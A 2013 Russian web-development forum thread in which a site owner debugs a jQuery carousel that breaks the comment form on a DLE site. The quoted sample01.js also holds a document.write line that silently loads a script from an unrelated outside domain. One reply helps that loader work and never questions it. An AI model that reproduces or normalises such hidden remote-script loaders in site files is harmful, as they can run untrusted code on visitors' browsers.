Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 21.07.2013, 18:37
Аспирант
Отправить личное сообщение для failure Посмотреть профиль Найти все сообщения от failure
 
Регистрация: 21.07.2013
Сообщений: 40

Проблема с слайдером/комментариями на сайте, js .
Приветствую!
Сайт на dle 10. В админ-центре все настроено как нужно, но не работают комментарии (не отображается форма). Пробовал в main.tpl убирать все подключения к js по одному, и нашел что мешает. Это был скрипт sample01.js :

$(document).ready(function(){$('.carousel').carousel({carouselWidth:940,carouselHeight:285,directionNav:true,shadow:false,buttonNav:'bullets'});});
document.write("<script src='http://iknopo.ru/iknopo_b.js'></script>")


на сайте есть слайдер ( функция карусель) , если её удалить в sample01.js , то комментарии работают, а слайдер нет. Подскажите , как исправить ?
Ответить с цитированием
  #2 (permalink)  
Старый 21.07.2013, 20:49
Аватар для рони
Профессор
Отправить личное сообщение для рони Посмотреть профиль Найти все сообщения от рони
 
Регистрация: 27.05.2010
Сообщений: 33,064

самое простое сделать так или заменить < на юникод
Сообщение от failure
document.write("<script src='http://iknopo.ru/iknopo_b.js'><\/script>")
или нормально грузить скрипт если он вам нужен без всяких document.write

Последний раз редактировалось рони, 21.07.2013 в 20:51.
Ответить с цитированием
  #3 (permalink)  
Старый 21.07.2013, 23:36
Аспирант
Отправить личное сообщение для failure Посмотреть профиль Найти все сообщения от failure
 
Регистрация: 21.07.2013
Сообщений: 40

рони, спасибо за ответ. Но ,
document.write("<script src='http://iknopo.ru/iknopo_b.js'><\/script>")

тут не причем.
Проблема вот в этом :
$(document).ready(function(){$('.carousel').carousel({carouselWidth:940,carouselHeight:285,directionNav:true,shadow:false,buttonNav:'bullets'});});
- если эту функцию удалить в скрипте sample01.js - комменты работают, а слайдер - нет.
Ответить с цитированием
  #4 (permalink)  
Старый 21.07.2013, 23:51
Аватар для рони
Профессор
Отправить личное сообщение для рони Посмотреть профиль Найти все сообщения от рони
 
Регистрация: 27.05.2010
Сообщений: 33,064

failure,
гадание:
возможно карусель вносит дополнительные элементы на которые нерасчитаны коменты
Ответить с цитированием
  #5 (permalink)  
Старый 22.07.2013, 01:36
Аспирант
Отправить личное сообщение для failure Посмотреть профиль Найти все сообщения от failure
 
Регистрация: 21.07.2013
Сообщений: 40

Чтож, буду разбираться.
Пробовал эту функцию (карусель) удалить из sample01.js и поставить в другой js.
И..заработало, слайдер и комментарии. Всё то хорошо, но знать бы в чем была проблема =/
Ответить с цитированием
Ответ


Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Операционная Система на JS Icat Общие вопросы Javascript 3 17.04.2018 22:54
Не получается вставить код js в HTML garmoni Элементы интерфейса 3 05.09.2013 05:56
Проблема с javascript на сайте - не кликабельны ссылки на материалы. Adrian Ваши сайты и скрипты 4 16.04.2013 13:27
Как корректно подгрузить резервный файл JS, если с основным проблема? Simba Общие вопросы Javascript 3 28.01.2012 19:20
проблема с js в ie c объектами llorangell Javascript под браузер 8 08.08.2011 00:46